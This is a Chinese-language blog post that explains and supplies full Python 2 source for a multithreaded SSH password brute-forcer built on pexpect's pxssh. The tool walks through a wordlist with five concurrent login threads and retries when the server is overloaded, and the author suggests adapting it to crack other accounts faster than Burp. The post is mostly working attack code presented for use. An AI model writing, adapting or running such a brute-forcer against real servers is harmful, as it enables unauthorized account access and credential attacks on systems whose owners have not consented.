1.开启多线程(t.start()后会继续运行,t.join()是等待子进程运行完毕)
2.Fail用于记录read_nonblocking和pxssh命令符提取失败的次数
3.maxConnections表示最大连接数(多线程,实际上是一个cpu在交替运行。。。。。)
代码编写思路:
main()函数
1.解析参数
2.循环遍历密码文件(开启5个线程连接,这里开启线程速度会更快是因为这里要远程连接,等待网络有阻塞,故开启多线程可以加快速度)
3.利用账号密码连接ssh服务器。
s=pxssh.pxssh()
s.login(host,user,password)
有三种返回情况,
登录成功
抛出三种异常,其中两种是因为ssh服务器被大量连接刷爆了,或者是pxxsh命令提示符连接困难。这两种情况都可以等会再连接。当发生五此这种超时错误时,可以过会再手动运行。
附上代码:
from threading import *
from pexpect import pxssh
import sys
import getopt
maxConnections=5
Found=False
connect_lock=BoundedSemaphore(value=maxConnections)
Fails=0
def connect(host,user,password,release):
global Fails
global connect_lock
global Found
try:
s=pxssh.pxssh()
#print user
#print password
#print "host" +str(host)
#print "user"+str(user)
#print "password"+str(password)
s.login(host,user,password)
print '[+] password Found'+password
Found=1
except Exception,e:
if "read_nonblocking" in str(e):
Fails+=1
sleep(5)
connect(host,user,password,False)
elif 'synchronize with original prompt' in str(e):
sleep(1)
connect(host,user,password,False)
finally:
if release:
connect_lock.release()
def usage():
print "ssh boom"
print "-u username"
print "-p destination passwordfile"
def main():
if not len(sys.argv[1:]):
usage()
try:
opts,args=getopt.getopt(sys.argv[1:],'u:p:h:')
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in "-u":
user=a
elif o in "-h":
host=a
elif o in "-p":
password=a
else:
usage()
if host==None or password==None or user==None:
usage()
exit(0)
fn=open(password,'r')
for line in fn.readlines():
#print "hello"
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails>5:
print "[!] Exiting :Too Many Socket Timeouts"
exit(0)
connect_lock.acquire()
passwd=line.strip('\r').strip('\n')
print "[-] Testing: " +str(passwd)
t= Thread(target=connect,args=(host,user,passwd,True))
t.start()
if __name__=='__main__':
main()
菜鸟实测,加上线程速度确实快了很多
小结:像这类网络,或者其他有阻塞的进程,开线程了可以提高好几倍的速度。其他的账号密码的破解可在此基础上编写,速度应该会比burp快很多